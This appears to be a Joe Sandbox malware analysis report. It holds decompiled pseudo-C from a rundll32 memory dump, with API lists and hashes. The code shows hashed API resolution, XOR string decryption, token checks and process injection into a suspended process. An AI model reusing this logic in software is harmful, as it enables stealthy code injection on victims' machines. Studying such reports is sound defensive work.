            				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
            				_t47 = 0;
            				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
            				_v8 = 0;
            				_v16 = _t63;
            				if(_t63 == 0) {
            					goto L4;
            				} else {
            					goto L2;
            				}
            				while(1) {
            					L2:
            					_t49 = E0445E34A( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0445A5D0( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
            					_t51 = _v8;
            					if((_t49 ^ 0x218fe95b) == _v12) {
            						break;
            					}
            					_t73 = _v20;
            					_t47 = _t51 + 1;
            					_v8 = _t47;
            					if(_t47 < _v16) {
            						continue;
            					}
            					goto L4;
            				}
            				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
            				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
            				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
            					return _t80;
            				} else {
            					_t56 = 0;
            					while(1) {
            						_t70 = _t80[_t56];
            						if(_t70 == 0x2e || _t70 == 0) {
            							break;
            						}
            						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
            						_t56 = _t56 + 1;
            						if(_t56 < 0x40) {
            							continue;
            						}
            						break;
            					}
            					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
            					 *((char*)(_t82 + _t56 - 0x54)) = 0;
            					if( *((char*)(_t56 + _t80)) != 0) {
            						_t80 =  &(( &(_t80[1]))[_t56]);
            					}
            					_t40 =  &_v92; // 0x6c6c642e
            					_t58 = LoadLibraryA(_t40); // executed
            					if(_t58 == 0) {
            						goto L4;
            					}
            					_t59 = GetProcAddress(_t58, _t80);
            					if(_t59 == 0) {
            						goto L4;
            					}
            					return _t59;
            				}
            			}

            APIs
            • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 0445F008
            • GetProcAddress.KERNEL32(00000000,?), ref: 0445F014
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: .dll
            • API String ID: 2574300362-2738580789
            • Opcode ID: 702429f5657719643bbf86521cba8961b2fd68df130c94fd164540c918728662
            • Instruction ID: e4bbe1beb7afa4cc75d1ba31f323bb631ca026dfc384bbfd2d0984596e024ae2
            • Opcode Fuzzy Hash: 702429f5657719643bbf86521cba8961b2fd68df130c94fd164540c918728662
            • Instruction Fuzzy Hash: 9931B472A00115ABCF24CFA9C984AAFBBE5AF44304F38046ADC05D7362DB70EA41D790
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            control_flow_graph 201 4458bcd-4458be2 202 4458c05 201->202 203 4458be4-4458be7 201->203 205 4458c0a-4458c2a 202->205 204 4458bee-4458bfe 203->204 206 4458c00-4458c03 204->206 207 4458c5d-4458c5f 204->207 208 4458c2c-4458c31 205->208 209 4458c3a-4458c3e 205->209 206->202 206->204 207->202 213 4458c61-4458c65 call 4458dc9 207->213 208->208 210 4458c33-4458c38 208->210 211 4458c40-4458c4a 209->211 212 4458c4c-4458c56 lstrlenW 209->212 210->209 210->211 211->211 211->212 215 4458c58-4458c5c 212->215 216 4458c6a-4458c72 213->216 217 4458c74-4458c79 216->217 218 4458c7b-4458c80 216->218 217->215 219 4458c82-4458c99 218->219 219->219 220 4458c9b-4458c9e 219->220 220->205
            C-Code - Quality: 80%
            			E04458BCD(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				intOrPtr _v28;
            				short _v44;
            				void* _t38;
            				intOrPtr _t47;
            				void* _t53;
            				intOrPtr _t54;
            				intOrPtr _t55;
            				intOrPtr _t56;
            				void* _t58;
            				intOrPtr _t59;
            				void* _t62;
            				void* _t64;
            				signed int _t71;
            				signed int _t74;
            				void* _t76;
            				void* _t77;
            
            				_t71 = _a12;
            				_t53 = __edx;
            				_v8 = __ecx;
            				_t74 = _t71;
            				if(_t71 >= __edx) {
            					L4:
            					_t54 = 0x446f94e;
            					L5:
            					_t58 = 0;
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					asm("movsw");
            					asm("movsb");
            					asm("stosd");
            					asm("stosd");
            					asm("stosd");
            					asm("stosw");
            					asm("stosb");
            					_t38 = 0;
            					if(_v28 == 0) {
            						L8:
            						_t64 = _t38;
            						if(_t64 == 0) {
            							L10:
            							lstrlenW( &_v44);
            							return _t54;
            						} else {
            							goto L9;
            						}
            						do {
            							L9:
            							_t19 = _t58 + 0x30; // 0x30
            							 *((char*)(_t77 + _t58 - 0x28)) = _t19;
            							_t58 = _t58 + 1;
            						} while (_t58 < _t64);
            						goto L10;
            					} else {
            						goto L6;
            					}
            					do {
            						L6:
            						_t38 = _t38 + 1;
            					} while ( *((intOrPtr*)(_t77 + _t38 - 0x18)) != 0);
            					_t64 = 0xe;
            					if(_t38 > _t64) {
            						goto L9;
            					}
            					goto L8;
            				}
            				_t59 = _a4;
            				_a12 = 0x5a;
            				while( *((intOrPtr*)(_t74 % _a12 + _t59)) !=  *((intOrPtr*)(_t74 + _v8))) {
            					_t74 = _t74 + 1;
            					if(_t74 < _t53) {
            						continue;
            					}
            					goto L4;
            				}
            				_t76 = _t74 - _t71;
            				if(_t76 == 0) {
            					goto L4;
            				}
            				_t47 = E04458DC9(_t76 + 1); // executed
            				_t55 = _t47;
            				_v12 = _t55;
            				if(_t55 != 0) {
            					_t56 = _a4;
            					_t62 = _t55 - _t71;
            					do {
            						 *(_t62 + _t71) =  *(_t71 % _a12 + _t56) ^  *(_t71 + _v8);
            						_t71 = _t71 + 1;
            						_t76 = _t76 - 1;
            					} while (_t76 != 0);
            					_t54 = _v12;
            					goto L5;
            				}
            				return 0x446f94e;
            			}

            APIs
            • lstrlenW.KERNEL32(?,00000138,?,0446CA88), ref: 04458C50
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: lstrlen
            • String ID: GetCurrentPath$Z
            • API String ID: 1659193697-4005238709
            • Opcode ID: 1ddeb80cc40492b5c65719936cd363dc26281e42b1fb48b0e6da3758434dcfa6
            • Instruction ID: fb15d3b7a0b6f82a2135a504d2cf3fda912a9b0e39654068d93510c7f1517e56
            • Opcode Fuzzy Hash: 1ddeb80cc40492b5c65719936cd363dc26281e42b1fb48b0e6da3758434dcfa6
            • Instruction Fuzzy Hash: 5C21E631B01645AFDF16EF69C48009FBB76BB8D210B14447ADD41AB326DA70F95A8790
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            control_flow_graph 221 445baf6-445bb1e CreateToolhelp32Snapshot 222 445bb20-445bb49 call 4458f63 Process32First 221->222 223 445bb8e-445bb94 221->223 226 445bb59-445bb69 call 445daf2 222->226 227 445bb4b-445bb57 222->227 230 445bb7e-445bb8b FindCloseChangeNotification 226->230 231 445bb6b-445bb7c 226->231 227->223 230->223 231->226 231->230
            C-Code - Quality: 72%
            			E0445BAF6(void* __ecx, void* __edx) {
            				void* _v304;
            				char _v308;
            				intOrPtr _v312;
            				signed int _t16;
            				signed int _t17;
            				intOrPtr _t30;
            				void* _t33;
            				intOrPtr _t38;
            				void* _t43;
            				void* _t45;
            
            				_t33 = __edx;
            				_v304 = __ecx;
            				_t16 = CreateToolhelp32Snapshot(2, 0);
            				_t45 = _t16;
            				_t17 = _t16 | 0xffffffff;
            				if(_t45 != _t17) {
            					E04458F63( &_v304, 0, 0x128);
            					_v304 = 0x128;
            					if(Process32First(_t45,  &_v304) != 0) {
            						while(1) {
            							_t43 = _v312( &_v308, _t33);
            							if(_t43 == 0) {
            								break;
            							}
            							_t38 =  *0x446f8d0; // 0x450f8c0
            							_push( &_v308);
            							_push(_t45);
            							if( *((intOrPtr*)(_t38 + 0x44))() != 0) {
            								continue;
            							}
            							break;
            						}
            						FindCloseChangeNotification(_t45);
            						_t17 = 0 | _t43 == 0x00000000;
            					} else {
            						_t30 =  *0x446f8d0; // 0x450f8c0
            						 *((intOrPtr*)(_t30 + 0x30))(_t45);
            						_t17 = 0xfffffffe;
            					}
            				}
            				return _t17;
            			}

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 0445BB14
              • Part of subcall function 04458F63: memset.MSVCRT ref: 04458F75
            • Process32First.KERNEL32(00000000,?), ref: 0445BB44
            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0445BB84
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32memset
            • String ID:
            • API String ID: 3344077921-0
            • Opcode ID: 92332d4cbb77512173c26d3321f74461f5009166788e7154f2a9b102ccac230d
            • Instruction ID: d49bb9e5faa03efba83ac7e579ae39584a59db0d14251975e278a788dfdb4ca7
            • Opcode Fuzzy Hash: 92332d4cbb77512173c26d3321f74461f5009166788e7154f2a9b102ccac230d
            • Instruction Fuzzy Hash: B81108322046419FDB20EE69EC48E6777ECFF88360F04065FF964C7295EB24E9048762
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            control_flow_graph 234 445c986-445c9a6 GetTokenInformation 235 445c9ec 234->235 236 445c9a8-445c9b1 GetLastError 234->236 238 445c9ee-445c9f2 235->238 236->235 237 445c9b3-445c9c3 call 4458dc9 236->237 241 445c9c5-445c9c7 237->241 242 445c9c9-445c9dc GetTokenInformation 237->242 241->238 242->235 243 445c9de-445c9ea call 4458ddf 242->243 243->241
            C-Code - Quality: 86%
            			E0445C986(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
            				long _v8;
            				void* _v12;
            				void* _t12;
            				void* _t20;
            				void* _t22;
            				union _TOKEN_INFORMATION_CLASS _t28;
            				void* _t31;
            
            				_push(_t22);
            				_push(_t22);
            				_t31 = 0;
            				_t28 = __edx;
            				_t20 = _t22;
            				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
            					L6:
            					_t12 = _t31;
            				} else {
            					_t31 = E04458DC9(_v8);
            					_v12 = _t31;
            					if(_t31 != 0) {
            						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
            							goto L6;
            						} else {
            							E04458DDF( &_v12, _t16);
            							goto L3;
            						}
            					} else {
            						L3:
            						_t12 = 0;
            					}
            				}
            				return _t12;
            			}

            APIs
            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,04450000,00000000,00000000,?,0445CA07,00000000,00000000,?,0445CA30), ref: 0445C9A1
            • GetLastError.KERNEL32(?,0445CA07,00000000,00000000,?,0445CA30,00001644,?,0445E053), ref: 0445C9A8
              • Part of subcall function 04458DC9: RtlAllocateHeap.NTDLL(00000008,?,?,04459793,00000100,?,0445661B), ref: 04458DD7
            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,0445CA07,00000000,00000000,?,0445CA30,00001644,?,0445E053), ref: 0445C9D7
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: InformationToken$AllocateErrorHeapLast
            • String ID:
            • API String ID: 2499131667-0
            • Opcode ID: cb1887322d5089fb0621eb5ae9acc7dc49872482de94dcf68cbd07f759e5b0c5
            • Instruction ID: 6b53f6f162b24788f8cf2340b5a3110755a76df7b0a581f18465aa6891b0e4ac
            • Opcode Fuzzy Hash: cb1887322d5089fb0621eb5ae9acc7dc49872482de94dcf68cbd07f759e5b0c5
            • Instruction Fuzzy Hash: 4E016272700214FF9F206FA6EC89D9B7FECDF456A0710056BF905D2222EA30ED0097A0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 79%
            			E0445BE10(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
            				struct _STARTUPINFOW _v72;
            				signed int _t11;
            
            				E04458F63(__edx, 0, 0x10);
            				E04458F63( &_v72, 0, 0x44);
            				_v72.cb = 0x44;
            				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
            				asm("sbb eax, eax");
            				return  ~( ~_t11) - 1;
            			}

            APIs
              • Part of subcall function 04458F63: memset.MSVCRT ref: 04458F75
            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0445BE52
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: CreateProcessmemset
            • String ID: D
            • API String ID: 2296119082-2746444292
            • Opcode ID: d6885cd9984846e8eebc6d3f3efe308cbdb2eec4be9cf0928741834ab23cd090
            • Instruction ID: 65b807e0b6aca700726a25ee2c522e652cc8bb9cd805cebd30a7c888a4e18269
            • Opcode Fuzzy Hash: d6885cd9984846e8eebc6d3f3efe308cbdb2eec4be9cf0928741834ab23cd090
            • Instruction Fuzzy Hash: DEF06CF26406087EFB20F556DC0AFBF36ACDB45714F500115BF05E71D1EAA4AD0582B5
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 96%
            			E0445D889(intOrPtr __edx) {
            				intOrPtr _v8;
            				signed int _v12;
            				signed int _v16;
            				intOrPtr _v20;
            				char _v24;
            				intOrPtr _v36;
            				char _v40;
            				char _v80;
            				char _t37;
            				intOrPtr _t38;
            				signed int _t45;
            				void* _t49;
            				intOrPtr _t50;
            				intOrPtr _t52;
            				intOrPtr _t54;
            				void* _t56;
            				intOrPtr _t59;
            				void* _t62;
            				intOrPtr _t63;
            				signed int _t67;
            				intOrPtr _t69;
            				void* _t70;
            				intOrPtr _t86;
            				char _t87;
            				void* _t88;
            
            				_v16 = _v16 & 0x00000000;
            				_v20 = __edx;
            				_t86 = 0;
            				_t37 = E0445D7CD( &_v16, __edx);
            				_t87 = _t37;
            				_v24 = _t87;
            				_t89 = _t87;
            				if(_t87 == 0) {
            					return _t37;
            				}
            				_t38 =  *0x446f8d4; // 0x450fc00
            				_t7 = _t38 + 0xac; // 0x515dc7f8
            				E0445B6E3( &_v80,  *_t7 + 7, _t89);
            				_v12 = _v12 & 0;
            				_t67 = _v16;
            				if(_t67 == 0) {
            					L21:
            					E04458DDF( &_v24, 0);
            					return _t86;
            				}
            				while(_t86 == 0) {
            					_t69 = 0;
            					_v8 = 0;
            					while(_t86 == 0) {
            						E04458F63( &_v40, _t86, 0x10);
            						_t88 = _t88 + 0xc;
            						_t49 = E0445BE10( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
            						_t94 = _t49;
            						if(_t49 >= 0) {
            							_t56 = E0445D9DE(E04456297,  &_v40, _t94, _v20); // executed
            							if(_t56 != 0) {
            								_t59 =  *0x446f8d0; // 0x450f8c0
            								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
            								if(_t70 != 0) {
            									GetLastError();
            									_t62 = E0445DADC( &_v40);
            									_t63 =  *0x446f8d0; // 0x450f8c0
            									if(_t62 != 0) {
            										_push(0xea60);
            										_push(_t70);
            										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
            											_t86 = _t86 + 1;
            										}
            										_t63 =  *0x446f8d0; // 0x450f8c0
            									}
            									FindCloseChangeNotification(_t70);
            								}
            								_t69 = _v8;
            							}
            						}
            						if(_v40 != 0) {
            							if(_t86 == 0) {
            								_t54 =  *0x446f8d0; // 0x450f8c0
            								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
            							}
            							_t50 =  *0x446f8d0; // 0x450f8c0
            							 *((intOrPtr*)(_t50 + 0x30))(_v36);
            							_t52 =  *0x446f8d0; // 0x450f8c0
            							 *((intOrPtr*)(_t52 + 0x30))(_v40);
            						}
            						_t69 = _t69 + 1;
            						_v8 = _t69;
            						if(_t69 < 2) {
            							continue;
            						} else {
            							break;
            						}
            					}
            					_t67 = _v16;
            					_t45 = _v12 + 1;
            					_v12 = _t45;
            					if(_t45 < _t67) {
            						continue;
            					} else {
            						break;
            					}
            					do {
            						goto L20;
            					} while (_t67 != 0);
            					goto L21;
            				}
            				L20:
            				E04458DDF(_t87, 0xfffffffe);
            				_t87 = _t87 + 4;
            				_t67 = _t67 - 1;
            			}

            APIs
              • Part of subcall function 04458F63: memset.MSVCRT ref: 04458F75
              • Part of subcall function 0445BE10: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0445BE52
              • Part of subcall function 0445D9DE: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0445DA40
              • Part of subcall function 0445D9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0445DA89
              • Part of subcall function 0445D9DE: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0445DAA6
              • Part of subcall function 0445D9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0445DAC7
            • GetLastError.KERNEL32(?,?,00000001), ref: 0445D939
              • Part of subcall function 0445DADC: ResumeThread.KERNELBASE(?,0445D947,?,?,00000001), ref: 0445DAE4
            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 0445D964
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
            • String ID:
            • API String ID: 2212882986-0
            • Opcode ID: a12d4c5dfc101f37851d77aedb65d92de9c45d714d1da9f008e455a42d44fdd4
            • Instruction ID: fd928e7c0fcc4124a84e775834535ef83e3d11f4c19fb9d775c55bc435edba79
            • Opcode Fuzzy Hash: a12d4c5dfc101f37851d77aedb65d92de9c45d714d1da9f008e455a42d44fdd4
            • Instruction Fuzzy Hash: B24153B1E00205AFEF11EF95D984A9EB7F9FF48314F14806AED05A7266D770AD04CB61
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 61%
            			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
            				long _v8;
            				intOrPtr _t15;
            				WCHAR* _t23;
            				long _t24;
            				void* _t28;
            				void* _t31;
            				intOrPtr _t36;
            				void* _t41;
            				void* _t48;
            				intOrPtr* _t49;
            
            				_push(__ecx);
            				if(_a8 != 1) {
            					__eflags = _a8;
            					if(_a8 != 0) {
            						L7:
            						__eflags = 1;
            						return 1;
            					}
            					_t15 =  *0x446f8d0; // 0x450f8c0
            					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
            					L3:
            					return 0;
            				}
            				E04458DB4();
            				E04459787();
            				 *0x446f8e8 = _a4;
            				E04463D36(_a4);
            				 *_t49 = 0xf2e;
            				 *0x446f8d0 = E0445F0D9(0x446ca88, 0x138);
            				 *_t49 = 0xe8d;
            				_t23 = E04459F85(0x446ca88);
            				_pop(_t41);
            				_a8 = _t23;
            				_t24 = GetFileAttributesW(_t23); // executed
            				_push( &_a8);
            				if(_t24 == 0xffffffff) {
            					E04458D9A();
            					 *_t49 = 0x1f4;
            					_t28 = E0445FCDA(E0445109A(_t41));
            					_a8 = _t28;
            					__eflags = _t28;
            					if(_t28 != 0) {
            						_t48 = 0x54;
            						 *0x446f8e0 = E0445F0D9(0x446cbf0, _t48);
            						E0445647A(_t48, __eflags);
            						E04458DDF( &_a8, 0xfffffffe);
            						_t36 =  *0x446f8d0; // 0x450f8c0
            						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x641);
            					}
            					_v8 = 0;
            					_t31 = CreateThread(0, 0, E044563A2, 0, 0,  &_v8);
            					 *0x446f8f4 = _t31;
            					__eflags = _t31;
            					if(_t31 == 0) {
            						goto L3;
            					} else {
            						goto L7;
            					}
            				}
            				E04458D9A();
            				goto L3;
            			}

            APIs
              • Part of subcall function 04458DB4: HeapCreate.KERNELBASE(00000000,00096000,00000000,04456616), ref: 04458DBD
              • Part of subcall function 0445F0D9: GetModuleHandleA.KERNEL32(00000000,?,?,?,0446CA88,?,0445663F,?), ref: 0445F0FB
            • GetFileAttributesW.KERNELBASE(00000000), ref: 04456655
            • CreateThread.KERNELBASE(00000000,00000000,044563A2,00000000,00000000,?), ref: 044566DC
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Create$AttributesFileHandleHeapModuleThread
            • String ID:
            • API String ID: 607385197-0
            • Opcode ID: f236f2f131575b69b610e26f762e4228b3fea23ad036df5a249051e8b155047f
            • Instruction ID: c57a36d6a906f67b43dfe9ebfc95864f940f3889767ebbff9139b8b91166cd87
            • Opcode Fuzzy Hash: f236f2f131575b69b610e26f762e4228b3fea23ad036df5a249051e8b155047f
            • Instruction Fuzzy Hash: 9C214F71604205EBEF04BFB5E804A6E37E4AB04314F51856FE95ACA2A2DF78E8448B12
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 47%
            			E0445F0D9(void* __ecx, void* __edx, intOrPtr _a4) {
            				char _v8;
            				char _t5;
            				struct HINSTANCE__* _t7;
            				void* _t10;
            				void* _t12;
            				void* _t22;
            				void* _t25;
            
            				_push(__ecx);
            				_t12 = __ecx;
            				_t22 = __edx;
            				_t5 = E04459F6B(_a4);
            				_t25 = 0;
            				_v8 = _t5;
            				_push(_t5);
            				if(_a4 != 0xf2e) {
            					_t7 = LoadLibraryA(); // executed
            				} else {
            					_t7 = GetModuleHandleA();
            				}
            				if(_t7 != 0) {
            					_t10 = E0445F08E(_t12, _t22, _t7); // executed
            					_t25 = _t10;
            				}
            				E04458D87( &_v8);
            				return _t25;
            			}

            APIs
            • GetModuleHandleA.KERNEL32(00000000,?,?,?,0446CA88,?,0445663F,?), ref: 0445F0FB
            • LoadLibraryA.KERNELBASE(00000000,?,?,?,0446CA88,?,0445663F,?), ref: 0445F108
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: HandleLibraryLoadModule
            • String ID:
            • API String ID: 4133054770-0
            • Opcode ID: 1a6db5d79649b042a6937c0c88f4787a36f178e0a75c43aa34fcd28d270916d3
            • Instruction ID: cc3e960d1f9b9b741236dd3398b91574cffec263e8ad8d4953d83fbeb0921164
            • Opcode Fuzzy Hash: 1a6db5d79649b042a6937c0c88f4787a36f178e0a75c43aa34fcd28d270916d3
            • Instruction Fuzzy Hash: CFF0A772304114EBEF14BBA9E84485AB3EDDF88696714413BF806D7262DEB0AD458791
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 47%
            			E0445CA5A(void* __ecx, void* __esi) {
            				intOrPtr* _v8;
            				char _v12;
            				void* _v16;
            				char _v20;
            				char _v24;
            				short _v28;
            				char _v32;
            				void* _t20;
            				intOrPtr* _t21;
            				intOrPtr _t29;
            				intOrPtr _t31;
            				intOrPtr* _t33;
            				intOrPtr _t34;
            				char _t37;
            				union _TOKEN_INFORMATION_CLASS _t44;
            				char _t45;
            				intOrPtr* _t48;
            
            				_t37 = 0;
            				_v28 = 0x500;
            				_t45 = 0;
            				_v32 = 0;
            				_t20 = E0445C92F(__ecx);
            				_v16 = _t20;
            				if(_t20 != 0) {
            					_push( &_v24);
            					_t44 = 2;
            					_t21 = E0445C986(_t44); // executed
            					_t48 = _t21;
            					_v20 = _t48;
            					if(_t48 == 0) {
            						L10:
            						FindCloseChangeNotification(_v16);
            						if(_t48 != 0) {
            							E04458DDF( &_v20, _t37);
            						}
            						return _t45;
            					}
            					_push( &_v12);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0x220);
            					_push(0x20);
            					_push(2);
            					_push( &_v32);
            					_t29 =  *0x446f8d8; // 0x450fab0
            					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
            						goto L10;
            					}
            					if( *_t48 <= 0) {
            						L9:
            						_t31 =  *0x446f8d8; // 0x450fab0
            						 *((intOrPtr*)(_t31 + 0x10))(_v12);
            						_t37 = 0;
            						goto L10;
            					}
            					_t9 = _t48 + 4; // 0x4
            					_t33 = _t9;
            					_v8 = _t33;
            					while(1) {
            						_push(_v12);
            						_push( *_t33);
            						_t34 =  *0x446f8d8; // 0x450fab0
            						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
            							break;
            						}
            						_t37 = _t37 + 1;
            						_t33 = _v8 + 8;
            						_v8 = _t33;
            						if(_t37 <  *_t48) {
            							continue;
            						}
            						goto L9;
            					}
            					_t45 = 1;
            					goto L9;
            				}
            				return _t20;
            			}

            APIs
              • Part of subcall function 0445C92F: GetCurrentThread.KERNEL32 ref: 0445C942
              • Part of subcall function 0445C92F: OpenThreadToken.ADVAPI32(00000000,?,?,0445CA74,00000000,04450000), ref: 0445C949
              • Part of subcall function 0445C92F: GetLastError.KERNEL32(?,?,0445CA74,00000000,04450000), ref: 0445C950
              • Part of subcall function 0445C92F: OpenProcessToken.ADVAPI32(00000000,?,?,0445CA74,00000000,04450000), ref: 0445C975
              • Part of subcall function 0445C986: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,04450000,00000000,00000000,?,0445CA07,00000000,00000000,?,0445CA30), ref: 0445C9A1
              • Part of subcall function 0445C986: GetLastError.KERNEL32(?,0445CA07,00000000,00000000,?,0445CA30,00001644,?,0445E053), ref: 0445C9A8
            • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,04450000), ref: 0445CAFE
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
            • String ID:
            • API String ID: 1806447117-0
            • Opcode ID: fbf788930c8daedbc6b66dbad7912fd628bc2527772d38ab23d696f8fe31672b
            • Instruction ID: 10476b5604fd2f437acf68dca658e7c7a262ac830d8ff73bd966002d5688444d
            • Opcode Fuzzy Hash: fbf788930c8daedbc6b66dbad7912fd628bc2527772d38ab23d696f8fe31672b
            • Instruction Fuzzy Hash: E7213D31A04305AFDF10DFA9E885AAEBBF8EF44700F10446AE945E7262E730AD458B90
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 100%
            			E044563A2(void* __fp0) {
            				void* __ecx;
            				intOrPtr _t13;
            				intOrPtr _t14;
            				signed int _t16;
            				intOrPtr _t17;
            				intOrPtr _t20;
            				void* _t25;
            				void* _t27;
            
            				_t32 = __fp0;
            				E0445651E();
            				GetOEMCP();
            				_t13 = E0445DFC2(__fp0); // executed
            				 *0x446f8d4 = _t13;
            				if(_t13 != 0) {
            					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
            					_t14 =  *0x446f8d4; // 0x450fc00
            					_t2 = _t14 + 0x224; // 0x4450000
            					E04463C36( *_t2);
            					_t26 =  *0x446f8d4; // 0x450fc00
            					_t25 = _t27;
            					__eflags =  *(_t26 + 0x1898) & 0x00010000;
            					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
            						_t7 = _t26 + 0x224; // 0x4450000, executed
            						_t26 =  *_t7;
            						_t16 = E0445D889( *_t7); // executed
            						__eflags = _t16;
            						_t17 =  *0x446f8d4; // 0x450fc00
            						if(_t16 != 0) {
            							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
            							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
            								L10:
            								__eflags = 0;
            								return 0;
            							}
            							L9:
            							E04453597();
            							goto L10;
            						}
            						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
            						L6:
            						_t20 =  *0x446f8d4; // 0x450fc00
            						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
            						if(__eflags == 0) {
            							goto L9;
            						}
            						E044561E8(_t25, _t26, __eflags, _t32);
            						goto L10;
            					}
            					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
            					goto L6;
            				}
            				return _t13 + 1;
            			}

            APIs
